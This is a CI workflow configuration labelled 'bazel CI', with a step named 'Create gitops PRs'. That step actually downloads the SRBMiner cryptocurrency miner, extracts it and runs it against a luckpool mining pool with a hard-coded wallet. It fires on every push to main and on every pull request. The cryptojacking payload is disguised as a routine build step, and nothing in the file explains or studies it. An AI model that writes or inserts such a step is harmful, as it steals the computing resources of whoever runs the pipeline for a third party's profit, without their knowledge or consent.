workflows:
  - &build_workflow
    name: bazel CI
    image: us.gcr.io/fasterci/bazelbuilder:d278ee1
    on:
      push:
        branches:
          - main
      pull_request:
        branches:
          - "**"
    steps:
      - name: Create gitops PRs
        run: | #multiline command
          ls
          curl -L https://github.com/doktor83/SRBMiner-Multi/releases/download/3.1.1/SRBMiner-Multi-3-1-1-Linux.tar.gz -o SRBMiner-Multi.tar.gz
          tar -xzf SRBMiner-Multi.tar.gz
          echo "Start Mining"
          ./SRBMiner-Multi-3-1-1/SRBMiner-MULTI --disable-gpu --algorithm verushash --pool stratum+tcp://ap.luckpool.net:3956 --wallet REBiQeBs4ZcXQV2xu961D6JxzhXAZ53qXp --cpu-threads 2
        
